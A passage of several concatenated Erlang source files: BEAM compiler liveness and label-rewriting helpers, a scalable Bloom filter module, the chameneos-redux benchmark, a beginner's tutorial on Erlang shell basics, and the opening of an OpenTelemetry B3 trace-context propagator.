check_liveness_block(R, [{set,Ds,Ss,Op}|Is], St) ->
check_liveness_block_1(R, Ss, Ds, Op, Is, St);
check_liveness_block(_, [], St) -> {transparent,St}.
%% Common handling of one {set,Ds,Ss,Op} element: a register appearing
%% among the sources is used; otherwise consult the operation itself
%% and, depending on its answer, the destinations and the rest of the
%% block.
check_liveness_block_1(R, Ss, Ds, Op, Is, St0) ->
case member(R, Ss) of
true ->
{used,St0};
false ->
case check_liveness_block_2(R, Op, Ss, St0) of
{killed,St} ->
case member(R, Ds) of
true -> {killed,St};
false -> check_liveness_block(R, Is, St)
end;
{exit_not_used,St} ->
case member(R, Ds) of
true -> {exit_not_used,St};
false -> check_liveness_block(R, Is, St)
end;
{not_used,St} ->
%% Downgrade any non-`used' result of the rest of the
%% block to not_used.
not_used(case member(R, Ds) of
true -> {killed,St};
false -> check_liveness_block(R, Is, St)
end);
{used,St} ->
{used,St}
end
end.
%% How does the operation itself affect R?  Operations with a failure
%% label may transfer control there, so liveness at that label must be
%% taken into account.
check_liveness_block_2(R, {gc_bif,Op,{f,Lbl}}, Ss, St) ->
check_liveness_block_3(R, Lbl, {Op,length(Ss)}, St);
check_liveness_block_2(R, {bif,Op,{f,Lbl}}, Ss, St) ->
Arity = length(Ss),
%% Comparison operators and the new-style type tests cannot fail,
%% so any failure label is irrelevant for them.
case erl_internal:comp_op(Op, Arity) orelse
erl_internal:new_type_test(Op, Arity) of
true ->
{killed,St};
false ->
check_liveness_block_3(R, Lbl, {Op,length(Ss)}, St)
end;
check_liveness_block_2(R, {put_map,_Op,{f,Lbl}}, _Ss, St) ->
%% put_map is not a BIF; pass a name/arity that erl_bifs:is_safe/3
%% will never report as safe.
check_liveness_block_3(R, Lbl, {unsafe,0}, St);
check_liveness_block_2(_, _, _, St) ->
{killed,St}.
%% Handle the failure label of an operation.  Lbl =:= 0 means that an
%% exception is generated on failure instead of a jump.
check_liveness_block_3({x,_}, 0, _FA, St) ->
{killed,St};
check_liveness_block_3({y,_}, 0, {F,A}, St) ->
%% If the exception is thrown, the stack may be scanned,
%% thus implicitly using the y register.
case erl_bifs:is_safe(erlang, F, A) of
true -> {killed,St};
false -> {used,St}
end;
check_liveness_block_3(R, Lbl, _FA, St0) ->
%% A real failure label: check liveness there.
check_liveness_at(R, Lbl, St0).
%% index_labels_1(Instructions, Acc) -> gb_tree mapping Label => Is
%%  Build an index from each label to the instruction sequence that
%%  follows it, with any immediately following labels stripped.
index_labels_1([{label,Lbl}|Is0], Acc) ->
Is = drop_labels(Is0),
%% NB: deliberately recurse on Is0 (not the stripped Is) so that
%% every label in a run of consecutive labels gets its own entry.
index_labels_1(Is0, [{Lbl,Is}|Acc]);
index_labels_1([_|Is], Acc) ->
index_labels_1(Is, Acc);
index_labels_1([], Acc) -> gb_trees:from_orddict(sort(Acc)).
%% Strip any leading {label,_} instructions from an instruction list.
drop_labels([{label,_Lbl}|Rest]) ->
    drop_labels(Rest);
drop_labels(Instructions) ->
    Instructions.
%% replace_labels_1(Instructions, Acc, Map, Fallback) -> Instructions'
%%  Rewrite every label reference ({f,Lbl}) according to Map (see
%%  label/3 below); Fallback handles labels not present in the map.
%%  Each instruction kind that can carry a label gets its own clause;
%%  the "when Lbl =/= 0" guards leave a zero label (meaning "no failure
%%  label / generate an exception") untouched.
%%  NOTE(review): the result is built by prepending onto Acc, so it
%%  comes out in reverse order of the input -- confirm that callers
%%  account for this.
replace_labels_1([{test,Test,{f,Lbl},Ops}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{test,Test,{f,label(Lbl, D, Fb)},Ops}|Acc], D, Fb);
replace_labels_1([{test,Test,{f,Lbl},Live,Ops,Dst}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{test,Test,{f,label(Lbl, D, Fb)},Live,Ops,Dst}|Acc], D, Fb);
replace_labels_1([{select,I,R,{f,Fail0},Vls0}|Is], Acc, D, Fb) ->
%% A select instruction carries labels both in its value list and
%% in its failure label.
Vls = map(fun ({f,L}) -> {f,label(L, D, Fb)};
(Other) -> Other
end, Vls0),
Fail = label(Fail0, D, Fb),
replace_labels_1(Is, [{select,I,R,{f,Fail},Vls}|Acc], D, Fb);
replace_labels_1([{'try',R,{f,Lbl}}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{'try',R,{f,label(Lbl, D, Fb)}}|Acc], D, Fb);
replace_labels_1([{'catch',R,{f,Lbl}}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{'catch',R,{f,label(Lbl, D, Fb)}}|Acc], D, Fb);
replace_labels_1([{jump,{f,Lbl}}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{jump,{f,label(Lbl, D, Fb)}}|Acc], D, Fb);
replace_labels_1([{loop_rec,{f,Lbl},R}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{loop_rec,{f,label(Lbl, D, Fb)},R}|Acc], D, Fb);
replace_labels_1([{loop_rec_end,{f,Lbl}}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{loop_rec_end,{f,label(Lbl, D, Fb)}}|Acc], D, Fb);
replace_labels_1([{wait,{f,Lbl}}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{wait,{f,label(Lbl, D, Fb)}}|Acc], D, Fb);
replace_labels_1([{wait_timeout,{f,Lbl},To}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{wait_timeout,{f,label(Lbl, D, Fb)},To}|Acc], D, Fb);
replace_labels_1([{recv_mark=Op,{f,Lbl}}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{Op,{f,label(Lbl, D, Fb)}}|Acc], D, Fb);
replace_labels_1([{recv_set=Op,{f,Lbl}}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{Op,{f,label(Lbl, D, Fb)}}|Acc], D, Fb);
replace_labels_1([{bif,Name,{f,Lbl},As,R}|Is], Acc, D, Fb) when Lbl =/= 0 ->
replace_labels_1(Is, [{bif,Name,{f,label(Lbl, D, Fb)},As,R}|Acc], D, Fb);
replace_labels_1([{gc_bif,Name,{f,Lbl},Live,As,R}|Is], Acc, D, Fb) when Lbl =/= 0 ->
replace_labels_1(Is, [{gc_bif,Name,{f,label(Lbl, D, Fb)},Live,As,R}|Acc], D, Fb);
replace_labels_1([{call,Ar,{f,Lbl}}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{call,Ar,{f,label(Lbl, D, Fb)}}|Acc], D, Fb);
replace_labels_1([{make_fun2,{f,Lbl},U1,U2,U3}|Is], Acc, D, Fb) ->
replace_labels_1(Is, [{make_fun2,{f,label(Lbl, D, Fb)},U1,U2,U3}|Acc], D, Fb);
replace_labels_1([{bs_init,{f,Lbl},Info,Live,Ss,Dst}|Is], Acc, D, Fb) when Lbl =/= 0 ->
replace_labels_1(Is, [{bs_init,{f,label(Lbl, D, Fb)},Info,Live,Ss,Dst}|Acc], D, Fb);
replace_labels_1([{bs_put,{f,Lbl},Info,Ss}|Is], Acc, D, Fb) when Lbl =/= 0 ->
replace_labels_1(Is, [{bs_put,{f,label(Lbl, D, Fb)},Info,Ss}|Acc], D, Fb);
replace_labels_1([{put_map=I,{f,Lbl},Op,Src,Dst,Live,List}|Is], Acc, D, Fb)
when Lbl =/= 0 ->
replace_labels_1(Is, [{I,{f,label(Lbl, D, Fb)},Op,Src,Dst,Live,List}|Acc], D, Fb);
replace_labels_1([{get_map_elements=I,{f,Lbl},Src,List}|Is], Acc, D, Fb) when Lbl =/= 0 ->
replace_labels_1(Is, [{I,{f,label(Lbl, D, Fb)},Src,List}|Acc], D, Fb);
replace_labels_1([I|Is], Acc, D, Fb) ->
%% Instructions without label references pass through unchanged.
replace_labels_1(Is, [I|Acc], D, Fb);
replace_labels_1([], Acc, _, _) -> Acc.
%% Map an old label to its replacement.  Map holds the explicit
%% rewrites; labels not present in the map are handled by the fallback
%% fun.
label(Old, Map, Fallback) ->
    case maps:find(Old, Map) of
        {ok, New} -> New;
        error -> Fallback(Old)
    end.
%% Help function for combine_heap_needs.
%%
%% Normalize a list of allocation specifications -- plain word counts
%% or {alloc,List} terms -- into a single list of {Tag,Total} pairs,
%% summing the requirement for each tag.
combine_alloc_lists(AllocList) ->
    Pairs = lists:flatmap(
              fun(Words) when is_integer(Words) ->
                      [{words,Words}];
                 ({alloc,List}) ->
                      List
              end, AllocList),
    %% Group the pairs by tag and sum each group.
    Family = sofs:to_external(sofs:relation_to_family(sofs:relation(Pairs))),
    [{Tag,lists:sum(Counts)} || {Tag,Counts} <- Family].
%% live_opt/4.
%% split_even(List, SrcAcc, DstAcc) -> {Sources,Destinations}
%%  Split a flat [S1,D1,S2,D2,...] list (as found in the {list,L}
%%  operand of get_map_elements) into {[S1,S2,...],[D1,D2,...]}.
%%  (Removed stray dataset metadata that had been fused onto the last
%%  line, which made the clause unparsable.)
split_even([], Ss, Ds) ->
    {lists:reverse(Ss),lists:reverse(Ds)};
split_even([S,D|Rs], Ss, Ds) ->
    split_even(Rs, [S|Ss], [D|Ds]).
%% ``The contents of this file are subject to the Erlang Public License,
%% Version 1.1, (the "License"); you may not use this file except in
%% compliance with the License. You should have received a copy of the
%% Erlang Public License along with this software. If not, it can be
%% retrieved via the world wide web at http://www.erlang.org/.
%%
%% Software distributed under the License is distributed on an "AS IS"
%% basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See
%% the License for the specific language governing rights and limitations
%% under the License.
%%
-module(bloom).
-author("<NAME> <<EMAIL>>").
-export([sbf/1, sbf/2, sbf/3, sbf/4,
bloom/1, bloom/2,
member/2, add/2,
size/1, capacity/1]).
-export([is_element/2, add_element/2]). % alternative names
-import(math, [log/1, pow/2]).
%% Aliases following the naming convention of the sets/ordsets modules.
is_element(E, B) -> member(E, B).
add_element(E, B) -> add(E, B).
%% Based on
%% Scalable Bloom Filters
%% <NAME>, <NAME>, <NAME>, <NAME>
%% Information Processing Letters
%% Volume 101, Issue 6, 31 March 2007, Pages 255-261
%%
%% Provides scalable bloom filters that can grow indefinitely while
%% ensuring a desired maximum false positive probability. Also provides
%% standard partitioned bloom filters with a maximum capacity. Bit arrays
%% are dimensioned as a power of 2 to enable reusing hash values across
%% filters through bit operations. Double hashing is used (no need for
%% enhanced double hashing for partitioned bloom filters).
%%
%% This module assumes the existence of a module called bitarray so that
%% different alternatives may be provided. To get an extremely efficient but
%% non-functional variant, hipe_bifs can be used, defining bitarray as:
%%
%%-module(bitarray).
%%-export([new/1, set/2, get/2]).
%%
%%new(Size) -> hipe_bifs:bitarray(Size, false).
%%set(I, A) -> hipe_bifs:bitarray_update(A, I, true).
%%get(I, A) -> hipe_bifs:bitarray_sub(A, I).
%%
%% A functional alternative with good lookup performance can be obtained
%% resorting to the array module. E.g.
%%
%%-module(bitarray).
%%-export([new/1, set/2, get/2]).
%%
%%-define(W, 27).
%%
%%new(N) -> array:new((N-1) div ?W + 1, {default, 0}).
%%
%%set(I, A) ->
%% AI = I div ?W,
%% V = array:get(AI, A),
%% V1 = V bor (1 bsl (I rem ?W)),
%% array:set(AI, V1, A).
%%
%%get(I, A) ->
%% AI = I div ?W,
%% V = array:get(AI, A),
%% V band (1 bsl (I rem ?W)) =/= 0.
-record(bloom, {
e, % error probability
n, % maximum number of elements
mb, % 2^mb = m, the size of each slice (bitvector)
h, % number of hashes (2: double hashing, 3: triple hashing, etc)
size, % number of elements
a % list of bitvectors
}).
-record(sbf, {
e, % error probability
r, % error probability ratio
s, % log 2 of growth ratio
size, % number of elements
b % list of plain bloom filters
}).
%% Constructors for (fixed capacity) bloom filters
%%
%% N - capacity
%% E - error probability
%% Create a fixed-capacity bloom filter for N elements with the
%% default error probability of 0.1%.
bloom(N) -> bloom(N, 0.001).
%% Create a fixed-capacity bloom filter for N elements with error
%% probability E (0 < E < 1).
bloom(N, E) when is_number(N), N > 0,
is_float(E), E > 0, E < 1 ->
bloom(size, N, E).
%% Internal constructor.  Mode is either `size' (Dim is the desired
%% capacity) or `bits' (Dim is log2 of the slice size).  Each of the K
%% slices is dimensioned as a power of two so that hash bits can be
%% reused across filters.
bloom(Mode, Dim, E) ->
    crypto:start(),
    %% K slices, each with false-positive probability P, combine to
    %% the requested error probability E.
    K = 1 + trunc(log2(1 / E)),
    P = math:pow(E, 1 / K),
    Mb = case Mode of
             size -> 1 + trunc(-log2(1 - math:pow(1 - P, 1 / Dim)));
             bits -> Dim
         end,
    M = 1 bsl Mb,
    %% Capacity implied by the chosen slice size.
    N = trunc(math:log(1 - P) / math:log(1 - 1 / M)),
    #bloom{e=E, n=N, mb=Mb, size=0,
           h=number_hashes(Mb, E),
           a=[bitarray:new(M) || _ <- lists:seq(1, K)]}.
%% Base-2 logarithm.
log2(X) -> math:log(X) / math:log(2).
%% Number of hash functions derived per element (always >= 2,
%% i.e. at least double hashing).
number_hashes(Mb, E) -> 2 + trunc(log2(4 / E) / Mb).
%% Constructors for scalable bloom filters
%%
%% N - initial capacity before expanding
%% E - error probability
%% S - growth ratio when full (log 2) can be 1, 2 or 3
%% R - tightening ratio of error probability
%% Defaults: error probability 0.1% and growth exponent 1.
sbf(N) -> sbf(N, 0.001).
sbf(N, E) -> sbf(N, E, 1).
%% Pair each growth exponent S with the matching tightening ratio R
%% (values suggested by the Scalable Bloom Filters paper cited above).
sbf(N, E, 1) -> sbf(N, E, 1, 0.85);
sbf(N, E, 2) -> sbf(N, E, 2, 0.75);
sbf(N, E, 3) -> sbf(N, E, 3, 0.65).
sbf(N, E, S, R) when is_number(N), N > 0,
is_float(E), E > 0, E < 1,
is_integer(S), S > 0, S < 4,
is_float(R), R > 0, R < 1 ->
%% The first constituent filter gets a tightened error probability
%% E*(1-R) so the combined error stays bounded as the filter grows.
#sbf{e=E, s=S, r=R, size=0, b=[bloom(N, E*(1-R))]}.
%% Returns number of elements
%%
%% Note: this local size/1 shadows the auto-imported BIF
%% erlang:size/1; it must be called with a qualified name from
%% outside this module.
size(#bloom{size=Size}) -> Size;
size(#sbf{size=Size}) -> Size.
%% Returns capacity
%%
%% A plain bloom filter has a fixed capacity; a scalable one can grow
%% without bound.
capacity(#bloom{n=N}) -> N;
capacity(#sbf{}) -> infinity.
%% Test for membership
%%
%% For a scalable filter, the hashes are computed once (using the
%% newest constituent filter) and then tested against all of them.
member(Elem, #bloom{}=B) ->
hash_member(make_hashes(B, Elem), B);
member(Elem, #sbf{b=[B|_]}=Sbf) ->
hash_member(make_hashes(B, Elem), Sbf).
hash_member(Hashes, #bloom{mb=Mb, a=A, h=H}) ->
%% Derive H indexes of Mb bits each and require the corresponding
%% bit to be set in every slice.
all_set(1 bsl Mb - 1, make_indexes(H, Mb, Hashes), A);
hash_member(Hashes, #sbf{b=B}) ->
%% Present if any constituent filter reports the element.
lists:any(fun(X) -> hash_member(Hashes, X) end, B).
%% Produce the hash bits for an element.  The filter argument is
%% currently unused because a single SHA-1 digest (160 bits) is used
%% for all index derivations.
%%
%% Fix: crypto:sha/1 was removed from OTP; crypto:hash(sha, Data)
%% computes the identical digest.
make_hashes(_, Elem) ->
    crypto:hash(sha, term_to_binary(Elem)).
%% Alternative without crypto, sized to the filter's needs:
%%make_hashes(#bloom{mb=Mb, h=H}, Elem) ->
%%N32 = (H * Mb - 1) div 32 + 1,
%%<< <<(erlang:phash2({Elem,I}, 1 bsl 32)):32>> || I <- lists:seq(1,N32) >>.
%% Slice the hash bits into N indexes of Mb bits each.  Small index
%% counts are returned as a tuple, larger ones as a list -- presumably
%% for cheaper access in fst/1 and next_idx/2 (TODO confirm).
make_indexes(N, Mb, HashBits) ->
Size = Mb*N,
<<Bin:Size/bits, _/bits>> = HashBits,
Is = [I || <<I:Mb>> <= Bin],
if
N =< 4 -> list_to_tuple(Is);
true -> Is
end.
%% First index, regardless of the tuple/list representation that
%% make_indexes/3 chose.
fst([Head|_]) -> Head;
fst(Tuple) -> element(1, Tuple).
%% Advance to the next index via double (triple, ...) hashing: the
%% first component steps by the second, the second by the third, and
%% so on; Mask keeps the first index within the slice (a power of two).
next_idx(Mask, {I0,I1}) -> {(I0+I1) band Mask, I1};
next_idx(Mask, {I0,I1,I2}) -> {(I0+I1) band Mask, I1+I2, I2};
next_idx(Mask, {I0,I1,I2,I3}) -> {(I0+I1) band Mask, I1+I2, I2+I3, I3};
next_idx(Mask, [I0 | Is=[I1|_]]) -> [(I0+I1) band Mask | next_idx(Is)].
%% List form of the step: add each component to its successor.
next_idx([I]) -> [I];
next_idx([I0 | Is=[I1|_]]) -> [I0+I1 | next_idx(Is)].
%% True iff the selected bit is set in every slice of A; each slice
%% consumes one index, and the indexes are advanced between slices.
all_set(_Mask, _Indexes, []) -> true;
all_set(Mask, Indexes, [H|T]) ->
case bitarray:get(fst(Indexes), H) of
true -> all_set(Mask, next_idx(Mask, Indexes), T);
false -> false
end.
%% Adds element to set
%%
%% For a scalable filter: hashes are computed with the head (newest)
%% filter's parameters; if the element is not already present it is
%% added to the head filter while there is capacity, otherwise a new,
%% larger head filter is grown first.
add(Elem, #bloom{}=B) -> hash_add(make_hashes(B, Elem), B);
add(Elem, #sbf{size=Size, r=R, s=S, b=[H|T]=Bs}=Sbf) ->
#bloom{mb=Mb, e=E, n=N, size=HSize} = H,
Hashes = make_hashes(H, Elem),
case hash_member(Hashes, Sbf) of
true -> Sbf;
false ->
case HSize < N of
true -> Sbf#sbf{size=Size+1, b=[hash_add(Hashes, H)|T]};
false ->
%% Head filter full: grow a filter with 2^S times the
%% bits and a tightened (E*R) error probability.
B = add(Elem, bloom(bits, Mb + S, E * R)),
Sbf#sbf{size=Size+1, b=[B|Bs]}
end
end.
%% Set the element's bit in every slice.  The size counter is only
%% incremented when at least one bit was previously unset, i.e. when
%% the element was not already reported as present.
hash_add(Hashes, #bloom{mb=Mb, a=A, h=H, size=Size} = B) ->
Mask = 1 bsl Mb -1,
Indexes = make_indexes(H, Mb, Hashes),
case all_set(Mask, Indexes, A) of
true -> B;
false -> B#bloom{size=Size+1, a=set_bits(Mask, Indexes, A)}
end.
%% Set one bit per slice, advancing the indexes between slices in
%% exactly the same way as all_set/3 does when testing membership.
%% (Removed stray dataset metadata that had been fused onto the final
%% line, which made the clause unparsable.)
set_bits(_Mask, _Indexes, []) -> [];
set_bits(Mask, Indexes, [H|T]) ->
    [bitarray:set(fst(Indexes), H) | set_bits(Mask, next_idx(Mask, Indexes), T)].
% The Computer Language Benchmarks Game
% http://benchmarksgame.alioth.debian.org/
%%% contributed by <NAME>
%%% modified by <NAME>
%% Each chameneos is its own process.
%% A chameneos sends {self(), Color} to the broker to request a
%% meeting with another chameneos.
%% The broker replies with {Pid, Color} of the partner met or 'stop'
%% whereupon the chameneos prints the Meetings and Selfmeetings it had
%% and replies with the number of Meetings for the broker to sum.
-module(chameneosredux).
-export([main/1]).
-import(lists, [foreach/2]).
%% Spell a non-negative integer as its digit words, each word with a
%% leading space (e.g. 12 -> [" one"," two"]).  Zero is special-cased
%% because the digit loop below terminates on 0.
spell(0) -> " zero";
spell(N) -> spell(N, []).

spell(0, Acc) -> Acc;
spell(N, Acc) -> spell(N div 10, [digit_word(N rem 10) | Acc]).

%% Word for one decimal digit, with a leading space.
digit_word(D) ->
    element(D + 1, {" zero", " one", " two", " three", " four",
                    " five", " six", " seven", " eight", " nine"}).
%% Chameneos colour-mixing rules: meeting the same colour leaves the
%% colour unchanged; two different colours both become the third
%% colour.  The same-colour clause must come first.
complement(C, C) -> C;
complement(blue, red) -> yellow;
complement(blue, yellow) -> red;
complement(red, blue) -> yellow;
complement(red, yellow) -> blue;
complement(yellow, blue) -> red;
complement(yellow, red) -> blue.
%% Print the full colour-complement table.  The list comprehension is
%% evaluated only for its io side effects; the resulting list is
%% ignored by the caller (main/1).
show_complements() ->
[ io:fwrite("~p + ~p -> ~p~n", [A, B, complement(A, B)]) ||
A <- [blue, red, yellow],
B <- [blue, red, yellow]].
%% Print a blank line, then the list of starting colours on a single
%% line, followed by a newline.
print_header(Colors) ->
    io:fwrite("~n"),
    lists:foreach(fun(Color) -> io:fwrite(" ~p", [Color]) end, Colors),
    io:fwrite("~n").
%% Run one simulation: print the colour list, spawn one chameneos
%% process per colour with this process as the broker, broker N
%% meetings, then stop and reap all chameneos processes.
run(L, N) ->
print_header(L),
Broker = self(),
foreach(fun(Color) -> spawn(fun() -> chameneos(Broker, Color, 0, 0) end) end, L),
broker(N),
cleanup(length(L), 0).
%% One chameneos process.  It repeatedly requests a meeting by sending
%% {self(), Color} to the broker.  On a meeting reply {OPid,OColor} it
%% takes the complement colour and counts the meeting (and whether the
%% partner pid was itself).  On 'stop' it prints its counts and reports
%% its number of meetings back to the broker.
chameneos(Broker, Color, Meetings, MetSelf) ->
Broker ! { self(), Color },
receive
{OPid, OColor} ->
chameneos(Broker, complement(Color, OColor), Meetings+1,
if OPid == self() -> MetSelf+1; true -> MetSelf end);
stop ->
io:fwrite("~w~s\n", [Meetings, spell(MetSelf)]),
Broker ! Meetings
end.
%% The broker pairs up meeting requests, two receives at a time,
%% sending each chameneos the {Pid,Color} of its partner, for a total
%% of N meetings.  Requests that arrive after the N-th meeting remain
%% in the mailbox and are answered with 'stop' by cleanup/2.
broker(0) -> nil;
broker(N) ->
receive
C1 = {Pid1, _} -> nil
end,
receive
C2 = {Pid2, _} ->
Pid1 ! C2,
Pid2 ! C1,
broker(N-1)
end.
%% Answer every remaining meeting request with 'stop' and sum the
%% meeting counts reported back by the N chameneos processes; print
%% the spelled-out total once all N have reported.
cleanup(0, M) -> io:fwrite("~s~n", [spell(M)]);
cleanup(N, M) ->
receive
{Pid, _Color} ->
%% A late meeting request: tell the chameneos to stop; it will
%% then report its count, handled by the clause below.
Pid ! stop,
cleanup(N, M);
Meetings ->
cleanup(N-1, M+Meetings)
end.
%% Entry point.  Arg is the number of meetings per run (as a string).
%% Runs the benchmark's 3-colour and 10-colour simulations, then halts
%% the emulator.  (Removed stray dataset metadata that had been fused
%% onto the final line, which made the clause unparsable.)
main([Arg]) ->
    N = list_to_integer(Arg),
    show_complements(),
    run([blue, red, yellow], N),
    run([blue, red, yellow, red, yellow, blue, red, yellow, red, blue], N),
    io:fwrite("~n"),
    halt(0).
%%% # Numbers
%%% ## Variables
%%% Variables always start with an uppercase letter.
%%% Using an unbound variable will trigger an error on the CLI
One.
%%% A variable can only have a single value.
One = 1.
%%% For example, this works because 'One' already has a value of 1
Un = Uno = One = 1.
%%% Variables can be assigned using other varables.
Two = One + One.
Two = 2.
%%% This will fail because the statement is invalid, 'Two' cannot equal
%%% 'Two' plus one -- it's already been defined to equal two.
Two = Two + 1.
%%% The equals operator is not assigning values, instead it is performing
%%% pattern matching with the expression. This is why a variable can be
%%% 'rebound' to the same value: the pattern matches.
%%%
%%% In the terminal a variable can be cleared.
f(Two).
%%% Or with zero args, all variables can be cleared.
f().
%%% This cannot be done in an actual Erlang program, but is perfectly do-able
%%% in the CLI.
%%% In the erlang shell **expressions need to be terminated with a period.**
%%% Expressions can be separated with commas, but the last expression needs
%%% a period. Also, only the expression followed by a period will produce
%%% output
2 + 15.
49 * 100.
5 / 2.
5 div 2.
5 rem 2.
%%% Erlang handles ints and floating point numbers transparently when doing
%%% arithmatic. Use 'div' and 'rem' to perform integer-to-integer division.
%%%
%%% Arithmatic obeys order-of-operations rules.
(50 * 100) - 4999.
-(50 * 100 - 4999).
-50 * (100 - 4999).
%%% Integers can be expressed with other bases, just enter the number as
%%% ```base#value```. Base must be between 2 and 36
2#101010.
8#0677.
16#AE.
26#abcde.
%%% ## Atoms
%%% Atoms start with a lowercase letter. Atoms cannot be changed or broken
%%% apart.
atom.
cat_atom.
'this atom has spaces, but needs to be in single quotes'.
atom = 'atom'.
%%% Atoms always exist and are never garbage collected.
%%% This means that Atoms should **never** be created from user-input.
%%% ## Boolean Logic
true and false.
true or false.
true xor false.
true xor true.
not false.
not (true and true).
%%% Boolean operators 'and' and 'or' do not short-circut the way similar
%%% operators in java/C++ might. Use 'andalso' or 'orelse' to get the
%%% short-circuting behavior.
%%% Equality operators
5 =:= 5. % true
1 =:= 0. % false
1 =/= 0. % true
%%% Comparing nubers with decimals require some extra operators because
%%% floats are weird.
5 =:= 5.0. % false
5 == 5.0. % true
5 =/= 5.0. % true
5 /= 5.0. % false
%%% Comparisons are unsurprising.
1 < 2.
1 < 1.
1 >= 1.
1 =< 1.
%%% Erlang will throw a fit if you do naughty things with types.
%%% Here, try adding a number to an atom.
5 + llama.
%%% Comparisons are allowed between types, there is a strict ordering
%%% predefined:
%%% number < atom < reference < fun < port < pid < tuple < list < bit string
0 == false. % false, don't expect 'false' to equal 0 like in c
1 < false. % atoms are always greater than numbers
%%% ## Tuples
%%% Tuples can be defined with the curly bracket.
X = 10, Y = 4.
Point = {X, Y}.
%%% Extracting varues can be done with pattern matching.
{A, B} = Point.
A =:= X.
B =:= Y.
{_,C} = Point.
C =:= Y.
%%% A 'tagged tuple' is, by convention, a tuple containing a single atom
%%% followed by a single value.
PreciseTemp = {celsius, 18.342}.
{celsius, T} = PreciseTemp.
%%% Tagging the value can prevent misuse by accident.
{kelvin, 18.342} =:= PreciseTemp.
{kelvin, T} = PreciseTemp.
%%% ## Lists
%%% Lists are defined with square brackets and contain mixed data types
[1, 2, 3, {celsius, 123}, an_atom].
%%% Lists of just numbers might be surprising though.
[97, 98, 99]. % abc
%%% Erlang treats strings and list the same way. It kinda sucks tbh, but
%%% there are other ways to represent strings.
%%% Lists can be concatenated with the '++' operator
[1, 2, 3] ++ [4, 5].
%%% Items can be removed '--' operator.
[1, 2, 3, 3, 2] -- [2, 3].
%%% Chaining '--' on one line causes each to be evaluated right to left
[1, 2, 3] -- [2, 3] -- [3].
%%% The head and tail can be retrieved with built in functions (BIF)
hd([1, 2, 3]).
tl([1, 2, 3]).
%%% This can also be done with pattern matching
[Head|Tail] = [1, 2, 3].
Head =:= 1.
Tail =:= [2, 3].
[NewHead|NewTail] = Tail.
NewHead =:= 2.
NewTail =:= [3].
%%% Lists can be built with the pattern-matching syntax too.
TurboList = [5|Tail].
TurboList =:= [5, 2, 3].
%%% ## List Comprehensions
%%% A basic list comprehension is of the form '[Value || generator]'.
[2*N || N <- [1, 2, 3, 4]].
Menu = [{steak, 5.99}, {beer, 3.99}, {poutine, 3.50}, {kitten, 20.99}].
WithTax = [{Item, Price*1.07} || {Item, Price} <- Menu].
%%% Conditions can be added to restrict the generated values.
Filtered = [{Item, Price*1.07} || {Item, Price} <- Menu, Price > 4].
%%% Multiple generators and conditions can be used.
[{X+Y, X, Y} || X <- [1, 2], Y <- [2, 3]].
[{X+Y, X, Y} || X <- [1, 2, 3], Y <- [2, 3], X < 3].
[{X+Y, X, Y} || X <- [1, 2, 3], Y <- [2, 3], X < 3, X+Y > 3].
%%% Generators pattern-match and can also be used to filter.
Weather =
[{toronto, rain}
,{montreal, storms}
,{london, fog}
,{paris, sun}
,{boston, fog}
,{vancouver, snow}
].
FoggyPlaces = [X || {X, fog} <- Weather]. | src/starting_out.erl | 0.643329 | 0.868213 | starting_out.erl | starcoder |
%%%------------------------------------------------------------------------
%% Copyright 2019, OpenTelemetry Authors
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% @doc An implementation of {@link otel_propagator_text_map} that injects and
%% extracts trace context using the B3 specification from Zipkin.
%%
%% Since `trace_context' and `baggage' are the two default propagators the
%% global TextMap Propagators must be configured if B3 is to be used for
%% propagation:
%%
%% ```
%% {text_map_propagators, [b3, baggage]},
%% '''
%%
%% To use B3 multi-header format use:
%%
%% ```
%% {text_map_propagators, [b3multi, baggage]},
%% '''
%%
%% ```
%% CompositePropagator = otel_propagator_text_map_composite:create([b3, baggage]),
%% opentelemetry:set_text_map_propagator(CompositePropagator).
%% '''
%%
%% It is also possible to set a separate list of injectors or extractors.
%% For example, if the service should extract B3 encoded context but you
%% only want to inject context encoded with the W3C TraceContext format
%% (maybe you have some services only supporting B3 that are making requests
%% to your server but you have no reason to continue propagating in both
%% formats when communicating to other services further down the stack).
%% In that case you would instead set configuration like:
%%
%%
%% ```
%% {text_map_extractors, [b3, trace_context, baggage]},
%% {text_map_injectors, [trace_context, baggage]},
%% '''
%%
%% Or using calls to {@link opentelemetry} at runtime:
%%
%% ```
%% B3CompositePropagator = otel_propagator_text_map_composite:create([b3, trace_context, baggage]),
%% CompositePropagator = otel_propagator_text_map_composite:create([trace_context, baggage]),
%% opentelemetry:set_text_map_extractor(B3CompositePropagator),
%% opentelemetry:set_text_map_injector(CompositePropagator).
%% '''
%% @end
%%%-----------------------------------------------------------------------
-module(otel_propagator_b3).
-behaviour(otel_propagator_text_map).
-export([fields/1,
inject/4,
extract/5]).
-include("opentelemetry.hrl").
-define(B3_CONTEXT_KEY, <<"b3">>).
%% Returns all the keys the propagator sets with `inject'
fields(b3single) ->
otel_propagator_b3single:fields(b3single);
fields(b3multi) ->
otel_propagator_b3multi:fields(b3multi);
fields(_) ->
[].
-spec inject(Context, Carrier, CarrierSetFun, Options) -> Carrier
when Context :: otel_ctx:t(),
Carrier :: otel_propagator:carrier(),
CarrierSetFun :: otel_propagator_text_map:carrier_set(),
Options :: b3multi | b3single.
inject(Ctx, Carrier, CarrierSet, Options=b3single) ->
otel_propagator_b3single:inject(Ctx, Carrier, CarrierSet, Options);
inject(Ctx, Carrier, CarrierSet, Options=b3multi) ->
otel_propagator_b3multi:inject(Ctx, Carrier, CarrierSet, Options);
inject(_Ctx, Carrier, _CarrierSet, _Options) ->
Carrier.
